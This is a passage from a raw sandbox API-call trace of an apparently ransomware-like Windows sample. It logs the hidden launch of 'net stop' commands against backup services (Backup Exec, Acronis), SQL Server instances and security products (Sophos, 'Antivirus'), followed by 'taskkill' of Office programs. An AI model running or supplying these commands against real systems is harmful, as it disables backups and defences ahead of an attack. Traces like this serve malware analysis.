lpProcessInformation=0x2689a84*(hProcess=0x550, hThread=0x518, dwProcessId=0x1324, dwThreadId=0xd3c)) returned 1 [0120.710] CloseHandle (hObject=0x478) returned 1 [0120.710] GetFileType (hFile=0x554) returned 0x3 [0120.710] CloseHandle (hObject=0x518) returned 1 [0122.958] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0122.958] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x478, hWritePipe=0x616ef94*=0x3cc) returned 1 [0122.958] GetCurrentProcess () returned 0xffffffff [0122.958] GetCurrentProcess () returned 0xffffffff [0122.958] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4b0) returned 1 [0122.958] CloseHandle (hObject=0x478) returned 1 [0122.959] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0122.959] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0122.959] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0122.959] CoTaskMemFree (pv=0x741d20) [0122.959] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecDeviceMediaService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eec4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x227282c | out: lpCommandLine="\"net.exe\" stop BackupExecDeviceMediaService /y", lpProcessInformation=0x227282c*(hProcess=0x51c, hThread=0x478, dwProcessId=0x4c0, dwThreadId=0xe24)) returned 1 [0122.973] CloseHandle (hObject=0x3cc) returned 1 [0122.973] GetFileType (hFile=0x4b0) returned 0x3 [0122.974] CloseHandle (hObject=0x478) returned 1 [0124.472] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.472] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x478, hWritePipe=0x616ef94*=0x3cc) returned 1 [0124.472] GetCurrentProcess () returned 0xffffffff [0124.472] GetCurrentProcess () returned 0xffffffff [0124.472] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x550) returned 1 [0124.472] CloseHandle (hObject=0x478) returned 1 [0124.473] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.473] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.473] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.473] CoTaskMemFree (pv=0x741d20) [0124.473] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$PRACTTICEBGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eed8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2542c58 | out: lpCommandLine="\"net.exe\" stop MSSQL$PRACTTICEBGC /y", lpProcessInformation=0x2542c58*(hProcess=0x4a8, hThread=0x478, dwProcessId=0xdc8, dwThreadId=0x624)) returned 1 [0124.478] CloseHandle (hObject=0x3cc) returned 1 [0124.478] GetFileType (hFile=0x550) returned 0x3 [0124.479] CloseHandle (hObject=0x478) returned 1 [0128.144] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0128.144] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3cc, hWritePipe=0x616ef94*=0x444) returned 1 [0128.144] GetCurrentProcess () returned 0xffffffff [0128.144] GetCurrentProcess () returned 0xffffffff [0128.144] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x448) returned 1 [0128.144] CloseHandle (hObject=0x3cc) returned 1 [0128.144] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.144] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0128.144] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0128.144] CoTaskMemFree (pv=0x741d20) [0128.145] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos Web Control Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eec4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x444, hStdError=0x0), lpProcessInformation=0x227213c | out: lpCommandLine="\"net.exe\" stop “Sophos Web Control Service” /y", lpProcessInformation=0x227213c*(hProcess=0x5a0, hThread=0x3cc, dwProcessId=0x914, dwThreadId=0x5b4)) returned 1 [0128.872] CloseHandle (hObject=0x444) returned 1 [0128.872] GetFileType (hFile=0x448) returned 0x3 [0128.872] CloseHandle (hObject=0x3cc) returned 1 [0133.960] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0133.960] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x444, hWritePipe=0x616ef94*=0x448) returned 1 [0133.961] GetCurrentProcess () returned 0xffffffff [0133.961] GetCurrentProcess () returned 0xffffffff [0133.961] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x520) returned 1 [0133.961] CloseHandle (hObject=0x444) returned 1 [0133.961] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0133.961] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0133.961] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0133.961] CoTaskMemFree (pv=0x741d20) [0133.961] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecJobEngine /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eed4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x22751b0 | out: lpCommandLine="\"net.exe\" stop BackupExecJobEngine /y", lpProcessInformation=0x22751b0*(hProcess=0x588, hThread=0x444, dwProcessId=0xa04, dwThreadId=0x61c)) returned 1 [0133.970] CloseHandle (hObject=0x448) returned 1 [0133.970] GetFileType (hFile=0x520) returned 0x3 [0133.971] CloseHandle (hObject=0x444) returned 1 [0135.878] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0135.878] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x448, hWritePipe=0x616ef94*=0x504) returned 1 [0135.878] GetCurrentProcess () returned 0xffffffff [0135.878] GetCurrentProcess () returned 0xffffffff [0135.878] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x534) returned 1 [0135.878] CloseHandle (hObject=0x448) returned 1 [0135.878] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0135.879] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0135.879] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0135.879] CoTaskMemFree (pv=0x741d20) [0135.879] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$PROD /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x279f9b8 | out: lpCommandLine="\"net.exe\" stop MSSQL$PROD /y", lpProcessInformation=0x279f9b8*(hProcess=0x444, hThread=0x448, dwProcessId=0xb0, dwThreadId=0x1284)) returned 1 [0135.893] CloseHandle (hObject=0x504) returned 1 [0135.893] GetFileType (hFile=0x534) returned 0x3 [0135.893] CloseHandle (hObject=0x448) returned 1 [0139.659] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0139.659] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x518, hWritePipe=0x616ef94*=0x4f4) returned 1 [0139.659] GetCurrentProcess () returned 0xffffffff [0139.659] GetCurrentProcess () returned 0xffffffff [0139.659] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4a4) returned 1 [0139.659] CloseHandle (hObject=0x518) returned 1 [0139.659] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0139.659] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0139.659] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0139.659] CoTaskMemFree (pv=0x741d20) [0139.660] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop AcronisAgent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4f4, hStdError=0x0), lpProcessInformation=0x2276464 | out: lpCommandLine="\"net.exe\" stop AcronisAgent /y", lpProcessInformation=0x2276464*(hProcess=0x3c4, hThread=0x518, dwProcessId=0x63c, dwThreadId=0x11fc)) returned 1 [0139.669] CloseHandle (hObject=0x4f4) returned 1 [0139.669] GetFileType (hFile=0x4a4) returned 0x3 [0139.669] CloseHandle (hObject=0x518) returned 1 [0141.180] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0141.180] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x4e0, hWritePipe=0x616ef94*=0x5a0) returned 1 [0141.180] GetCurrentProcess () returned 0xffffffff [0141.180] GetCurrentProcess () returned 0xffffffff [0141.180] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x520) returned 1 [0141.180] CloseHandle (hObject=0x4e0) returned 1 [0141.180] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0141.180] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0141.180] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0141.180] CoTaskMemFree (pv=0x741d20) [0141.181] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecManagementService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eec4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5a0, hStdError=0x0), lpProcessInformation=0x228ae50 | out: lpCommandLine="\"net.exe\" stop BackupExecManagementService /y", lpProcessInformation=0x228ae50*(hProcess=0x3c4, hThread=0x4e0, dwProcessId=0x12fc, dwThreadId=0x1250)) returned 1 [0141.644] CloseHandle (hObject=0x5a0) returned 1 [0141.649] GetFileType (hFile=0x520) returned 0x3 [0141.649] CloseHandle (hObject=0x4e0) returned 1 [0142.860] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0142.861] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x50c, hWritePipe=0x616ef94*=0x4b0) returned 1 [0142.861] GetCurrentProcess () returned 0xffffffff [0142.861] GetCurrentProcess () returned 0xffffffff [0142.861] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x418) returned 1 [0142.861] CloseHandle (hObject=0x50c) returned 1 [0142.861] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0142.861] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0142.861] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0142.861] CoTaskMemFree (pv=0x741d20) [0142.861] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$PROFXENGAGEMENT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eed0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x22b6044 | out: lpCommandLine="\"net.exe\" stop MSSQL$PROFXENGAGEMENT /y", lpProcessInformation=0x22b6044*(hProcess=0x588, hThread=0x50c, dwProcessId=0xf74, dwThreadId=0xcf8)) returned 1 [0142.879] CloseHandle (hObject=0x4b0) returned 1 [0142.879] GetFileType (hFile=0x418) returned 0x3 [0142.879] CloseHandle (hObject=0x50c) returned 1 [0144.035] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0144.035] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x50c, hWritePipe=0x616ef94*=0x4b0) returned 1 [0144.036] GetCurrentProcess () returned 0xffffffff [0144.036] GetCurrentProcess () returned 0xffffffff [0144.036] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x46c) returned 1 [0144.036] CloseHandle (hObject=0x50c) returned 1 [0144.036] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0144.036] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0144.036] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0144.036] CoTaskMemFree (pv=0x741d20) [0144.036] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop Antivirus /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x247b540 | out: lpCommandLine="\"net.exe\" stop Antivirus /y", lpProcessInformation=0x247b540*(hProcess=0x3f0, hThread=0x50c, dwProcessId=0x11c4, dwThreadId=0x1218)) returned 1 [0144.045] CloseHandle (hObject=0x4b0) returned 1 [0144.045] GetFileType (hFile=0x46c) returned 0x3 [0144.045] CloseHandle (hObject=0x50c) returned 1 [0144.046] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.015] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.106] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.226] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.533] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.587] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.764] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.765] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.767] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.767] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.772] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.772] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.777] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.777] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.782] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.782] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.786] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.793] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.794] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.838] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.881] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.948] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.961] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.961] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.962] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.963] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.963] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.990] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.998] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.998] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.000] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.000] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.072] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.077] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.422] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0146.422] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x50c, hWritePipe=0x616ef94*=0x4b0) returned 1 [0146.422] GetCurrentProcess () returned 0xffffffff [0146.422] GetCurrentProcess () returned 0xffffffff [0146.422] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x500) returned 1 [0146.423] CloseHandle (hObject=0x50c) returned 1 [0146.423] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0146.423] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0146.423] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0146.423] CoTaskMemFree (pv=0x741d20) [0146.423] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mspub.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x2498518 | out: lpCommandLine="\"taskkill.exe\" /IM mspub.exe /F", lpProcessInformation=0x2498518*(hProcess=0x464, hThread=0x50c, dwProcessId=0xd10, dwThreadId=0x62c)) returned 1 [0146.781] CloseHandle (hObject=0x4b0) returned 1 [0146.781] GetFileType (hFile=0x500) returned 0x3 [0146.781] CloseHandle (hObject=0x50c) returned 1 [0147.924] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.924] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x50c, hWritePipe=0x616ef94*=0x4b0) returned 1 [0147.924] GetCurrentProcess () returned 0xffffffff [0147.924] GetCurrentProcess () returned 0xffffffff [0147.924] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x52c) returned 1 [0147.925] CloseHandle (hObject=0x50c) returned 1 [0147.925] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.925] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.925] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.925] CoTaskMemFree (pv=0x741d20) [0147.925] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM onenote.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eedc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x24a0674 | out: lpCommandLine="\"taskkill.exe\" /IM onenote.exe /F", lpProcessInformation=0x24a0674*(hProcess=0x598, hThread=0x50c, dwProcessId=0x994, dwThreadId=0x1154)) returned 1 [0147.930] CloseHandle (hObject=0x4b0) returned 1 [0147.931] GetFileType (hFile=0x52c) returned 0x3 [0147.931] CloseHandle (hObject=0x50c) returned 1 [0149.547] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.547] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: 